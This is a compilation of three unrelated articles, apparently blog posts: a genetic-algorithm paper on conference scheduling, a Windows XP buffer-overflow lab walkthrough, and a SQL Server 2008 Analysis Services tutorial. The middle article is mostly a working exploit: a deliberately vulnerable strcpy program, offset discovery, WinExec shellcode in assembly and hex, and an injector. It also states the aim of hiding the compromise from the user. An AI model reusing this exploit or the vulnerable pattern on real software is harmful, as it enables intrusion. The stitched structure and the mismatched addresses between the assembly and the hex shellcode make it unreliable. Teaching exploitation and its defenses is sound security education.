Genetic Algorithm for Conference Schedule Mining

Ali Tarhini

 

Problem Definition:

Scheduling sessions, also known as "timetabling," at a large conference is a persistent challenge. Given a large number of sessions, rooms, and time slots, together with a set of constraints, the task is to mine for the best schedule that covers all sessions within the given time slots while satisfying the required constraints. Allocating sessions to specific time slots requires advanced computational techniques for finding the schedule that satisfies the most constraints. The problem with large conferences is that many sessions are scheduled to run concurrently, so an attendee may find that two or more of his/her favorite sessions run at the same time. There have been efforts to tackle the problem by using "tracks" to categorize sessions, which assumes that an attendee will stick to one track whose sessions are scheduled sequentially in time. This solution turns out to be inefficient in practice because attendees tend to hop from one track to another rather than strictly following the schedule of a single track.

More advanced approaches reduce the problem to the Job Shop Scheduling Problem (JSSP) with multiple precedence constraints, an optimization problem composed of resources, operations, and constraints. A job consists of a sequence of operations, with each operation part of exactly one job. Each operation is executed on a resource, with a start time and a processing time, subject to precedence constraints. A job has a release date, a completion time, and a due date. A resource can execute only one operation at a time, and we assume that successive operations of the same job are processed on different machines. The goal is to find a feasible schedule that optimizes a set of given performance measures. However, JSSP formulations tend to be theoretical and are not practical for international conferences, because the algorithm does not take into account human interest in a particular set of sessions. For example, JSSP cannot handle attendees' favorite sessions, because these are not a constraint; they are a training set.

In this paper, a genetic algorithm is presented as a solution to the conference scheduling problem. In the context of genetic algorithms, a class of approximation algorithms, our "solution" means one among the set of all possible "best" solutions. It may not be the best possible solution, but it is certainly among the best.

Proposed algorithm:

Input: Sessions, Rooms, Timeslots, set of preference sessions.

Like any genetic algorithm, this approach relies on the principle of "survival of the fittest": as solutions are generated, bad solutions are eliminated and good solutions are carried over to the next step. To determine what is good and what is bad, a fitness function is used. This function validates a given solution against the set of constraints and the list of preferred sessions and returns a value indicating how relevant the solution is. The fitness function also takes into consideration the training set of favorite sessions recommended by attendees and rewards solutions that come close to those favorite choices.

A solution is simply a set of associations of a session to a room and a timeslot.

The algorithm starts by generating solutions at random, that is, by randomly picking a session and assigning it to a room and a timeslot. The session is then removed from the input, and the selected room/timeslot pair is removed from the list of remaining rooms/timeslots. This eliminates the possibility of assigning the same session twice and improves the odds of generating solutions that are at least worth considering. We denote the set of generated solutions as generation 0, the first generation. Next, each solution in generation 0 is passed to the fitness function, which compares the solution against the set of constraints and returns a value indicating relevance. Once all solutions are evaluated, they are sorted in ascending order (assuming a lower value indicates a better solution), the top X percent of the solutions is carried over to the next generation, and all remaining solutions are discarded. The surviving solutions undergo two operations to compute the next generation: mutation and crossover. In mutating a solution, one association of a session to a room/timeslot is selected and the session is changed to a different session that is not already listed in the solution. In crossover, two solutions are picked at random and sessions are exchanged between them. This procedure is repeated over many generations until a solution that meets most of the constraints is found. A minimal code sketch of this loop is given below.
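To make the loop concrete, here is a minimal C sketch of the approach. The population size, penalty weights, preference list, and the use of uniform crossover are illustrative assumptions rather than part of the algorithm as specified, and duplicate room/slot assignments are penalized by the fitness function instead of being removed from the input during generation.

#include <stdio.h>
#include <stdlib.h>

#define SESSIONS    40   /* number of sessions to place (assumed) */
#define ROOMS        5
#define SLOTS        8
#define POP        100   /* population size (assumed) */
#define SURVIVORS   20   /* the top X percent carried over (assumed) */
#define GENERATIONS 500

typedef struct { int room[SESSIONS]; int slot[SESSIONS]; } Solution;

static const int g_prefs[] = {3, 7, 12};  /* an attendee's favorite sessions (assumed) */
static const int g_nprefs  = 3;

/* Lower is better: heavy penalty for two sessions in the same room and
 * slot, lighter penalty when two preferred sessions share a slot. */
static int fitness(const Solution *s) {
    int cost = 0;
    for (int i = 0; i < SESSIONS; i++)
        for (int j = i + 1; j < SESSIONS; j++)
            if (s->slot[i] == s->slot[j]) {
                if (s->room[i] == s->room[j]) cost += 10;   /* hard clash */
                int pi = 0, pj = 0;
                for (int k = 0; k < g_nprefs; k++) {
                    if (g_prefs[k] == i) pi = 1;
                    if (g_prefs[k] == j) pj = 1;
                }
                if (pi && pj) cost += 3;                    /* soft clash */
            }
    return cost;
}

/* Mutation: reassign one randomly chosen session. */
static void mutate(Solution *s) {
    int i = rand() % SESSIONS;
    s->room[i] = rand() % ROOMS;
    s->slot[i] = rand() % SLOTS;
}

/* Uniform crossover: each gene is copied from one of the two parents. */
static void crossover(const Solution *a, const Solution *b, Solution *c) {
    for (int i = 0; i < SESSIONS; i++) {
        const Solution *src = (rand() & 1) ? a : b;
        c->room[i] = src->room[i];
        c->slot[i] = src->slot[i];
    }
}

static int by_fitness(const void *x, const void *y) {
    return fitness((const Solution *)x) - fitness((const Solution *)y);
}

int main(void) {
    srand(42);
    static Solution pop[POP];
    /* generation 0: random solutions */
    for (int p = 0; p < POP; p++)
        for (int i = 0; i < SESSIONS; i++) {
            pop[p].room[i] = rand() % ROOMS;
            pop[p].slot[i] = rand() % SLOTS;
        }
    for (int g = 0; g < GENERATIONS; g++) {
        qsort(pop, POP, sizeof(Solution), by_fitness);
        /* the bottom of the population is discarded and refilled
         * by crossover and mutation of the survivors */
        for (int p = SURVIVORS; p < POP; p++) {
            crossover(&pop[rand() % SURVIVORS], &pop[rand() % SURVIVORS], &pop[p]);
            mutate(&pop[p]);
        }
    }
    qsort(pop, POP, sizeof(Solution), by_fitness);
    printf("best schedule cost: %d\n", fitness(&pop[0]));
    return 0;
}

The comparator re-evaluates the fitness on every call, which keeps the sketch short; a real implementation would cache fitness values per solution.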

 

References:

[1] Wayne Smith, Applying Data Mining To Scheduling Courses at a University, School of Information Systems and Technology, Claremont Graduate University.

This study demonstrates the feasibility of applying the principles of data mining. Specifically, it uses association rules to evaluate a nonstandard ("aberrant") timetabling pilot study undertaken in one college at a university. The results indicate that inductive methods are indeed applicable, that both summary and detailed results can be understood by key decision-makers, and that straightforward, repeatable SQL queries can be used as the chief analytical technique on a recurring basis. In addition, this study was one of the first empirical studies to provide an accurate measure of the discernible, but negligible, scheduling exclusionary effects that may impact course availability and diversity negatively.

[2] Atif Shahzad, Nasser Mebarki, Discovering Dispatching Rules For Job Shop Scheduling Problem Through Data Mining.

A data mining based approach to discover previously unknown priority dispatching rules for the job shop scheduling problem is presented. The approach seeks the knowledge assumed to be embedded in the efficient solutions provided by an optimization module built using tabu search. The objective is to discover scheduling concepts using data mining and to obtain a rule set capable of approximating the efficient solutions in a dynamic job shop scheduling environment. A data mining based scheduling framework is presented which consists of three phases: searching for a set of solutions; cleaning the resulting solutions, including aggregation and attribute construction; and finally model induction and interpretation by applying a decision tree induction algorithm.

[3] Ahmed Hamdi Abu Absa, Sana'a Wafa Al-Sayegh, E-Learning Timetable Generator Using Genetic Algorithms.

 

In this paper, the authors explain the details of the implementation of a computer program which employs Genetic Algorithms (GAs) in the quest for an optimal lecture timetable generator. GA theory is covered with emphasis on less fully encoded systems employing non-genetic operators. The field of automated timetabling is also explored. A timetable is explained as, essentially, a schedule with constraints placed upon it. The program, written in Java, uses special genetic algorithm libraries for its implementation. On a simplified university timetable problem it consistently evolves timetables free of constraint violations. The effects of altered mutation rate and population size are tested. It is seen that the GA could be improved by the further incorporation of repair strategies, and is readily scalable to the complete timetabling problem.

 

[4] Branimir Sigl, Marin Golub, Vedran Mornar, Solving Timetable Scheduling Problem Using Genetic Algorithms.

 

In this paper a genetic algorithm for solving the timetable scheduling problem is described. The algorithm was tested on small and large instances of the problem. Algorithm performance was significantly enhanced by modifying the basic genetic operators. Intelligent operators restrain the creation of new conflicts in an individual and improve the algorithm's overall behavior.
The program uses eliminating selection, which chooses and eliminates bad individuals from the current population, making room for new children born from the remaining individuals. The probability of elimination increases proportionally with the fitness value of the individual. As the remaining individuals are better than the population average, their children are expected to be better as well. There is some (very small) probability that eliminating selection deletes the best individual, which would ruin the algorithm's efforts and set its work back by some number of generations. Therefore, a protection mechanism for the best individuals has to be provided so that good genetic material is sustained in the population. This is called elitism; the authors' choice was to keep just the top individual.


Exploit the buffer – Buffer Overflow Attack

Theoretical Introduction:

A program is a set of instructions that aims to perform a specific task. In order to run any program, its source code must first be translated into machine code. The compiler translates the high level language into a low level language, producing an executable file; to simplify its representation for the user, the machine code is displayed in hexadecimal format. When the executable file is run, it is loaded into memory, which is divided into two parts: the text part and the data part [1]. The machine code of the program is loaded into the text part, which is a read-only area and can't be changed [1]. If the program contains static variables such as global variables or constants, these are stored in a part of memory called the static data area [1]. During the program's runtime, variables are allocated in memory on either the heap or the stack, depending on the type of memory allocation used (by value or by reference). Memory is laid out with the text part first, followed by the static data, followed by the heap and the stack, from lower to higher memory addresses [1]. The heap grows from lower to higher memory addresses, whereas the stack grows from higher to lower memory addresses based on the concept of Last In First Out (LIFO), where the last element that enters the stack is the first one to go out (Fig. 1) [1]. The stack is a contiguous space in memory where information about any running function is stored, which can be either data or addresses.

Figure 1

For example, assume we have the following program [2]:


void fn1() {
    char buffer1[5];
    char buffer2[10];
}

void main() {
    fn1();
}

 

By looking at the assembly language output we see that the call to fn1() is translated to:

 

push %ebp
mov  %esp,%ebp
sub  $20,%esp

The stack allocation of the above program is shown below:

High Memory
Return address of main
EBP
Buffer1
Buffer1
Buffer2
Buffer2
Buffer2
Low Memory

The ESP, EBP and EIP registers are 32-bit CPU registers. The ESP register (stack pointer) always points to the top of the stack, where the last element in the stack is stored (the lowest memory address). The EBP register (base pointer) points to the current frame, which corresponds to a call to a function that hasn't returned yet. The EIP register contains the address of the next instruction to be executed.

Each time a function is called, the address of the instruction following the call is pushed onto the stack; this value is obtained from the EIP register of the CPU. The return address is stored on the stack in order to return correctly to the instruction following the function call. After pushing the EIP value, the EBP value obtained from the EBP register is pushed onto the stack, which establishes a new frame pointer for the called function. The ESP register always points to the top of the stack. Memory is always allocated in blocks of word size, which is why buffer1 is allocated 8 bytes instead of 5 and buffer2 is allocated 12 bytes instead of 10 [2].

Hackers can exploit the fact that the return address is stored on the stack: they overflow the buffer by entering data larger than its allocated size, taking advantage of the lack of boundary checking in some C and C++ functions. The functions that lack boundary checking include gets(), strcpy(), strcat(), sprintf(), vsprintf(), scanf(), sscanf(), fscanf(), and others [3].

Buffer overflow vulnerabilities have been increasing recently [1]. Attackers who exploit a buffer overflow take advantage of the presence of the return address of a running function on the stack and try to change this return address in order to execute any executable file they choose, or simply to crash the system. This is achieved by overflowing the buffer with data larger than its size until reaching the location of the return address on the stack. The return address can be overwritten with the address of malicious code, causing the program to execute that code instead of returning to main. It can also be overwritten with arbitrary data, causing the program to jump to an invalid address, raise a segmentation error, and crash [4].

Brief Outline of the Steps

The hacker trying to achieve a buffer overflow should undergo the following steps:

  1. He should identify the existence of a buffer overflow vulnerability. When a user enters a long string of characters as input to a program and the program displays an access violation error, the program is identified as having a buffer overflow vulnerability, and the hacker can now use it as the target for executing malicious code.
  2. He should identify the location of the return address inside the stack. Identifying the buffer size is not sufficient to locate the return address, because there is sometimes an unknown number of junk bytes between the EBP and EIP values stored on the stack. The return address location is found by brute force: a long string of distinct characters is entered as input (each character repeated four times so that it occupies one word, e.g., AAAABBBBCCCCDDDD), and OllyDbg is used to identify which of the entered characters ends up in the return address, thereby revealing its location.
  3. He should find the shellcode of the code he wants to execute. This shellcode is entered as input into the vulnerable program, with NOPs (no-operation instructions) used in case the shellcode doesn't fill the entire buffer. OllyDbg is then used to identify the address of this shellcode.
  4. He should write and run the program that feeds the vulnerable code its exploit input: the shellcode is written into the buffer, NOPs are added if there are unfilled bytes in the buffer, and the address of the start of the buffer is placed into the return address slot on the stack.

List of Machines and Software Used

  • Windows XP SP2
  • Microsoft Visual Studio (buffer security check turned off)
  • C or C++ code containing at least one of the buffer overflow vulnerable functions.
  • OllyDbg

Attack Explained

  1. Write the following C application which simply copies an input string into a buffer of size 49 bytes:

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>

int fn1(char *str) {
    char local[49];
    strcpy(local, str);
    return 0;
}

int main(int argc, char *args[]) {
    fn1(args[1]);
    return 0;
}

  2. Call the program with an input string shorter than 49 characters; the program executes normally:

    Open cmd and type buffer.exe AAAABBBBCCCC

  3. Try to discover the presence of the buffer overflow vulnerability in the C code by passing a large string parameter.

Open cmd and type:

buffer.exe AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO

Since the program displayed an error when we entered a long string of characters as input, it is identified as containing a buffer overflow vulnerability and can now be used as our target for executing shellcode. The program is vulnerable because it uses strcpy to copy the input into a buffer of size 49 characters. If we enter a string larger than 49 characters, the stack is corrupted because the return address saved on the stack is overwritten with bytes from the string, which form an invalid address. Hackers can exploit this by entering a large string that overwrites the return address with the address of their malicious code.

  4. Try to identify the location of the return address in the stack.
    1. Open buffer.exe using OllyDbg and pass the following long string parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ

      Each character is repeated 4 times so that each letter occupies a word size memory location.

    2. Keep pressing Run until you reach the return instruction, then press Run once more and check the value of EIP in the registers panel:

    3. The value of EIP is 4F4F4F4F which is the hexadecimal representation of OOOO.

We conclude that the return address is located 56 bytes from the beginning of the input string:

52 bytes are reserved in the stack for the buffer of size 49. The buffer gets 52 bytes instead of 49 because memory is allocated in terms of the word size, which is 4 bytes.

The following 4 bytes are reserved for the value of the EBP register.

The return address, which holds the saved EIP value, is found 56 bytes after the start of the string. The stack looks like the following:

OOOO (place of the Return address which is the value of EIP)
NNNN ( EBP)
MMMM
LLLL
KKKK
JJJJ
IIII
HHHH
GGGG
FFFF
EEEE
DDDD
CCCC
BBBB
AAAA

So now, any 4 bytes we place after the string AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN (which will later be replaced by shellcode) will overwrite the contents of the return address, and the program will jump to the address we entered instead of returning to main.

  5. Now that we have identified the location of the return address, we need to write the shellcode that will run a calculator and then call exit, so that no error is displayed to the user and he won't know that his code has been exploited.

The steps are the following:

  1. Find the assembly code of WinExec and how it is called from the Windows documentation:

global _start
_start:
jmp short GetCommand
CommandReturn:
    pop ebx              ;ebx now holds the handle to the string
    xor eax,eax
    push eax
    xor eax,eax          ;for some reason the registers can be very volatile, did this just in case
    mov [ebx + 89],al    ;insert the NULL character
    push ebx
    mov ebx,0x758ee695
    call ebx             ;call WinExec(path,showcode)
    xor eax,eax          ;zero the register again, clears winexec retval
    push eax
    mov ebx, 0x758b2acf
    call ebx             ;call ExitProcess(0)
GetCommand:
    ;the N at the end of the db will be replaced with a null character
    call CommandReturn
    db "calc.exe"

  2. Find the addresses of WinExec and ExitProcess using the arwin tool. These addresses are different on every machine.


  3. Replace the old addresses of WinExec and ExitProcess in the assembly code with the new addresses found.

  4. Assemble the code into object code using the nasm tool.


  5. Link the object code into an executable using the ld tool.


  6. Extract the shellcode by dumping the opcodes with the objdump tool.


We have now found the shellcode for running a calculator followed by an exit:

\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65

This shellcode will be written in place of the buffer, and since the shellcode is smaller than the buffer, we add NOPs (no-operation instructions, represented by \x90) at the beginning of the buffer; these do not affect the code.

  6. Now we need to find the address of the buffer, because the shellcode is written in its place. To find this address we will use OllyDbg.
    1. Open buffer.exe using OllyDbg and pass the following parameter:

      AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQ

    2. Look at the stack pane and scroll up to find the following hexadecimal pattern:

      4141414142424242434343434444444445454545464646464747474748484848494949494A4A4A4A4B4B4B4B4C4C4C4C4D4D4D4D…


      The address of the buffer is identified as 0013FF40 (the location of 41414141, the hexadecimal representation of AAAA). The address of the shellcode is therefore 0013FF40, which is written in little-endian byte order as \x40\xFF\x13. We avoid including the null byte \x00 because it would terminate the string.

  7. Create the attack application, which calls buffer.exe with our shellcode:

    #include <stdio.h>
    #include <string.h>
    #include <windows.h>

    int main() {
        //the executable filename of the vulnerable app
        //(sized large enough to hold the filename, the shellcode and the return address)
        char xp[128] = "buffer.exe ";

        //Address of the shellcode
        char ret[] = "\x40\xFF\x13";

        //the shellcode of calc.exe winxp followed by exit
        char of[] =
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65";

        //concatenate buffer.exe with the shellcode followed by the address of the shellcode
        strcat(xp, of);
        strcat(xp, ret);

        //execute the concatenated string
        WinExec(xp, 0);
        return 0;
    }

    Note that a few NOPs were added at the beginning of the shellcode in order to fill the buffer, since the shellcode doesn't fill it completely. The stack will look like the following:

\x40\xFF\x13
\x2e\x65\x78\x65
\x63\x61\x6c\x63
\xe0\xff\xff\xff
\x7c\xff\xd3\xe8
\xbb\xa2\xca\x81
\xd3\x31\xc0\x50
\x11\x86\x7c\xff
\x59\x53\xbb\x4d
\x31\xc0\x88\x43
\x5b\x31\xc0\x50
\x90\x90\xeb\x1b
\x90\x90\x90\x90
\x90\x90\x90\x90
\x90\x90\x90\x90
  8. Finally, execute the exploit:

The overflow has been successfully executed since the calculator has been run.

How to avoid Buffer overflows

  • Prefer languages that perform bounds checking over C or C++. If you are writing C or C++ code, use functions that perform bounds checking: for example, instead of strcpy or strcat use strncpy or strncat [1] (see the sketch after this list).
  • Try to write secure programs by writing additional code that performs bounds checking [1].
  • Use tools that can analyze the source code for buffer overflow vulnerabilities [1].
  • Patch the system, since newer systems have been developed with buffer overflows in mind in order to avoid them [1].
  • Turn the buffer security check back on in the project properties in Visual Studio. This protection detects overwrites of the return address and stops the kind of attack shown above from locating and abusing the return address.
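As a minimal sketch of the bounds-checking advice above (the function name fn1_safe is illustrative, and the buffer size mirrors the vulnerable example from earlier in this article), the unsafe strcpy call can be replaced like this:

#include <string.h>

/* Bounds-checked rewrite of fn1 from the vulnerable program above.
 * strncpy alone does not guarantee null termination, so the last
 * byte is set explicitly. */
int fn1_safe(const char *str) {
    char local[49];
    strncpy(local, str, sizeof(local) - 1);  /* copy at most 48 bytes */
    local[sizeof(local) - 1] = '\0';         /* always terminate */
    return 0;
}

int main(void) {
    /* the long input that crashed buffer.exe is now truncated safely */
    fn1_safe("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO");
    return 0;
}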

References

[1] http://www.sans.org/reading_room/whitepapers/securecode/buffer-overflow-attack-mechanism-method-prevention_386

[2] http://insecure.org/stf/smashstack.html

[3] http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/buffer-overflow.html

[4] http://www.cs.umass.edu/~trekp/csc262/lectures/04c.pdf

[5] http://www.acsac.org/2005/papers/119.pdf

[6] http://isis.poly.edu/kulesh/stuff/etc/bo.pdf

[7] http://ieeexplore.ieee.org/Xplore/login.jsp?url=http%3A%2F%2Fieeexplore.ieee.org%2Fiel5%2F6658%2F17794%2F00821514.pdf%3Farnumber%3D821514&authDecision=-203


Data Mining in SQL Server 2008 & Visual Studio


Creating a Project in the Business Intelligence Development Studio

Follow these steps to create a new project. To start BIDS, click the Start button and go to All Programs -> Microsoft SQL Server 2008 -> SQL Server Business Intelligence Development Studio. In BIDS, select File -> New -> Project. You will see the Business Intelligence Projects template. Click the Analysis Services Project template. Type "AnalysisServices2008Tutorial" as the project name, select the directory in which you want to create this project, and click OK to create the project.

The Solution Explorer Pane

The Solution Explorer contains the following:

1) Data source objects: They contain details of a connection to a data source, which include server name, catalog or database name, and login credentials. You establish connections to relational servers by creating a data source for each one.

2) Data Source Views: When working with a large operational data store you don’t always want to see all the tables in the database. With Data Source Views (DSVs), you can limit the number of visible tables by including only the tables that are relevant to your analysis.

3) Cubes: A collection of measure groups (from the fact tables) and a collection of dimensions form a cube. Each measure group is composed of a set of measures. Despite the name, cubes are not necessarily three-dimensional objects and can have more than three dimensions.

4) Dimensions: They are the set of tables that are used for building the cube. Attributes that are needed for the analysis task are selected from each table.

5) Mining Structures: Data mining is the process of analyzing raw data using algorithms that help discover interesting patterns not typically found by ad-hoc analysis. Mining structures are objects that hold information about a data set; a collection of mining models forms a mining structure. Each mining model is built using a specific data mining algorithm and can be used for analyzing patterns in existing data or predicting new data values.

 

The Properties Pane

 

If you click an object in the Solution Explorer, the properties for that object appear in the Properties pane. Items that cannot be edited are grayed out. If you click a particular property, the description of that property appears in the Description pane at the bottom of the Properties pane.

 

 

 

Data Mining in SQL Server 2008

 

The data mining process consists of a series of steps, described below:

1) Creating a Data Source:

Cubes and dimensions of an Analysis Services database must retrieve their data values from tables in a relational data store. This data store, typically part of a data warehouse, must be defined as a data source.

To create a data source, follow these steps:

a) Select the Data Sources folder in the Solution Explorer.

b) Right-click the Data Sources folder and click New Data Source. This launches the Data Source Wizard.

c) In the Data Source Wizard you provide the connection information for the relational data source that contains the "Adventure Works DW 2008" database. Click the New button under Data Connection Properties to specify the connection details: the server name, the database name, and one of the two authentication modes, either SQL Server authentication or Windows authentication.

d) In the Impersonation Information page you specify the impersonation details that Analysis Services will use to connect to the relational data source. There are four options. You can provide a domain username and password to impersonate, or select the Analysis Services instance's service account for the connection. The option "Use the credentials of the current user" is primarily used for data mining, where you retrieve data from the relational server for prediction. If you use the Inherit option, Analysis Services uses the impersonation information specified for the database.

e) On the final page, the Data Source Wizard uses the relational database name you selected as the name for the data source object being created. You can accept the default name or specify a new one.

2) Creating a Data Source View (DSV)

The Adventure Works DW database contains 25 tables. The cube you build here uses 10 of them. Data Source Views give you a logical view of the tables that will be used within your OLAP database.

To create a Data Source View, follow these steps:

a) Select the Data Source Views folder in the Solution Explorer.

b) Right-click Data Source Views and select New Data Source View. This launches the Data Source View Wizard.

c) In the Data Source View Wizard you select the tables and views needed for the Analysis Services database you are creating. Click the > button so that the tables move to the Included Objects list. We will include the following tables in the data source view:

FactInternetSales, FactResellerSales, DimProduct, DimReseller, DimPromotion, DimCurrency, DimEmployee, DimSalesTerritory, DimTime, DimCustomer, DimGeography.

d) At the final page of the DSV Wizard you can specify your own name for the DSV object or use the default name. Specify the “Adventure Works DW” for the DSV Name in the wizard and click Finish.

If you open the data source view from the Solution Explorer, the Data Source View editor opens. It contains three main areas: the Diagram Organizer, the Tables view, and the Diagram view. In the Diagram view you see a diagram of all the added tables with the relationships among them. In the Tables view you see all the tables contained in this data source view. In the Diagram Organizer you can right-click in the pane to create a new diagram and drag and drop the tables you wish to add, or simply add any table you want, then right-click on it and choose Add Related Tables; this adds all the tables related to the chosen table. To add a new field to a given table, right-click the table in the Diagram view and choose New Named Calculation; a dialog appears where you enter the name of the new field and the formula from which it is derived. For example, to add a new field named FullName to the Employee table, you write the following formula: FirstName + ' ' + MiddleName + ' ' + LastName.

There are different layouts in the data source view. You can switch between rectangular layout and diagonal layout in the DSV by right-clicking in the DSV Designer and selecting the layout type of your choice.

To see a sample of the data specified by your DSV, right-click a table in the DSV Designer and select Explore Data. The data presented is only a subset of the underlying table data. By default the first 5,000 rows are retrieved and shown within this window. You can change the number of rows retrieved by clicking the Sampling Options button, which launches the Data Exploration Options dialog where you can change the sampling method, sample count, and number of states per chart, which is used for displaying data in the chart format.

When you click the Pivot Table tab you get an additional window called PivotTable Field List that shows all the columns of the table. You can drag and drop these columns inside the pivot table in the row, column, details, or filter areas. The values in the row and column provide you with an intersection point for which the detailed data is shown.

3) Creating New Dimensions

Dimensions help you define the structure of your cube so as to facilitate effective data analysis. Specifically, dimensions provide you with the capability of slicing data within a cube, and these dimensions can be built from one or more dimension tables.

a) Create the DimGeography dimension:

 Launch the Dimension Wizard by right-clicking Dimensions in the Solution Explorer and selecting New Dimension.

 In the Select Creation Method screen select the “Use an existing table” option and click next.

 In the Specify Source Information page, you select the DSV for creating the dimension, select the main table from which the dimension is to be designed, specify the key columns for the dimension, and optionally specify a name column for the dimension key value. By default, the first DSV in your project is selected; because the current project has only one DSV (the Adventure Works DW DSV), it is selected. Select the DimGeography table from the Main table drop-down list.

 Click the Next button to proceed to the next step in the Dimension Wizard.

 The Dimension Wizard now analyzes the DSV to detect any outward-facing relationships from the DimGeography table. An outward-facing relationship is a relationship between the DimGeography table and another table, such that a column in the DimGeography table is a foreign key related to that table. The Select Related Tables screen shows that the wizard detected an outward relationship between the DimGeography table and the DimSalesTerritory table. In this example you will model the DimGeography table as a star schema table instead of a snowflake schema. Deselect the DimSalesTerritory table and click next.

 The Select Dimension Attributes screen of the Dimension Wizard displays the columns of the main table that have been selected for the dimension you’re creating.

 Select all the attributes of the DimGeography table (all the attributes in the screen), leave their Attribute Type as Regular, allow them to be browsed, and click next.

 The final screen of the Dimension Wizard shows the attributes that will be created for the dimension based on your choices in the wizard. Click the Finish button.

Open the DimGeography dimension by double-clicking it in the Solution Explorer. In the Dimension Structure tab you can see all the table attributes that have been added to this dimension. In the Hierarchies pane, drag and drop the English Country Region Name attribute, followed by State Province Name, then City, and then Postal Code. Next, build the relationships among these attributes in the hierarchy by clicking the Attribute Relationships tab and dragging the Postal Code attribute toward City (meaning that the postal code value determines the city), dragging City toward State, and dragging State toward Country. This establishes the functional dependencies among the attributes in the hierarchy. Then ensure that the city value uniquely determines the state name value by setting the KeyColumns property of the City attribute to both State Province Code and City, and setting its NameColumn to City. Similarly, set the KeyColumns of the Postal Code attribute to the Postal Code, City, and State Province Code attributes, and set its NameColumn to Postal Code.

Deploy the project by right-clicking the project name and choosing Deploy. After a successful deployment, you can browse the dimension by selecting the Browser tab, where you can see all the data of the DimGeography table arranged according to their hierarchical levels.

b) Create the DimTime dimension

 Launch the Dimension Wizard by right-clicking Dimensions in the Solution Explorer and selecting New Dimension. When the welcome screen of the Dimension Wizard opens up, click next.

 In the Select Creation Method page of the wizard, select the “Use an existing table” option and click next.

 In the Specify Source Information page, select DimTime as the main table from which the dimension is to be designed and click next.

  In the Select Dimension Attributes page, in addition to the Date Key attribute, enable the checkboxes for the following attributes: Calendar Year, Calendar Semester, Calendar Quarter, English Month Name, and Day Number of Month.

 Set the Attribute Type for the “Calendar Year” attribute to Date Calendar Year.

 Set the Attribute Type for the “Calendar Semester” attribute to Date Calendar Half Year.

 Set the Attribute Type for the “Calendar Quarter” attribute to Date Calendar Quarter.

 Set the Attribute Type for the “English Month Name” attribute to Date Calendar Month.

 Set the Attribute Type for the “Day Number of Month” attribute to Date Calendar Day of Month.

 Create a multilevel hierarchy Calendar Date with the levels Calendar Year, Calendar Semester, Calendar Quarter, Month (rename English Month Name), and Day (rename Day Number Of Month).

 Save the project and deploy it to the analysis services instance.

 Switch to the Browser pane of the DimTime dimension, where you can see that the date hierarchy is arranged according to the hierarchy that we defined above.

c) Create the DimEmployee dimension

 Launch the Dimension Wizard by right-clicking Dimensions in the Solution Explorer and selecting New Dimension. If the welcome screen of the Dimension Wizard opens up, click next.

 Make sure the “Use an existing table” option is selected and click next.

 In the Specify Source Information page, select DimEmployee as the main table from which the dimension is to be designed and click next.

 On the Select Related Tables screen, uncheck the DimSalesTerritory table and click next.

 In the Select Dimension Attributes dialog, the Dimension Wizard has detected three columns of the DimEmployee table to include as attributes. The Dimension Wizard selects columns if they are either the primary key of the table or a foreign key to another table in the DSV. The attributes suggested by the Dimension Wizard in this example are the key attribute Employee Key, the parent-child attribute Parent Employee Key, and Sales Territory Key, which is a foreign key column to the DimSalesTerritory table.

 Select all the columns of the DimEmployee table as attributes and click next.

 Double-click the DimEmployee dimension in the Solution Explorer to open the Dimension Designer.

 Change the NameColumn property of the key attribute of DimEmployee to FullName and deploy the project to your Analysis Services instance.

When you browse the parent-child hierarchy, you will see the members of the hierarchy showing the full names of the employees.

4) Creating a Cube Using the Cube Wizard

Cubes are the principal objects of an OLAP database that help in data analysis. They are multidimensional structures primarily composed of dimensions and facts. The data from the fact tables stored within the cube for analysis are called measures.

To build a new cube, follow these steps:

a) Right-click the Cubes folder and select New Cube. Click next on the introduction page to proceed.

b) In the Select Creation Method page you have the option to build a cube from existing tables, create an empty cube, or create a cube based on a template and generate new tables in the data source. Choose to build the cube from the existing tables in the Adventure Works DW data source. Click Next to proceed to the next step in the Cube Wizard.

c) The next page of the Cube Wizard is the Measure Group Tables selection page. You must now select one or more tables that will serve as fact tables for your measure groups. Click the Suggest button to have the Cube Wizard scan the DSV, detect the fact and dimension tables, and automatically select the candidate tables. Any table that has an outgoing relationship is identified as a candidate fact table, whereas a table that has an incoming relationship is detected as a dimension table. Select both FactResellerSales and FactInternetSales as the fact tables, and then select the measures you need to include from these fact tables for the analysis task.

d) In the Select Existing Dimensions page, the Cube Wizard displays a list of all existing dimensions defined in the project. Accept the selection of all the dimensions and click next.

e) The Cube Wizard asks you to select any new dimensions to be created from existing tables in the data source that are not already used for dimensions in the project. You can deselect dimensions that are not needed for your cube on this page. This illustration will use the Fact tables only as measure groups and not for dimensions. Deselect the Fact Reseller Sales and Fact Internet Sales dimensions on this page and click next.

f) In the final page of the Cube Wizard you can specify the name of the cube to be created and review the measure groups, measures, dimensions, attributes, and hierarchies. Use the default name Adventure Works DW suggested by the Cube Wizard and click Finish.

After creating the cube, the new dimensions are automatically created. But these dimensions will have only their primary and foreign keys selected. You have to open each created dimension and select the attributes that you need to add from each table.

g) Press F5 to deploy, build and process the cube. Deploying the cube means building the cube according to the structure that you have defined, while processing the cube means computing all the aggregation values for all the cells in the cube.

You can add a new calculated measure to the cube by right-clicking in the Script Organizer pane of the Calculations tab and entering the formula for the new measure.

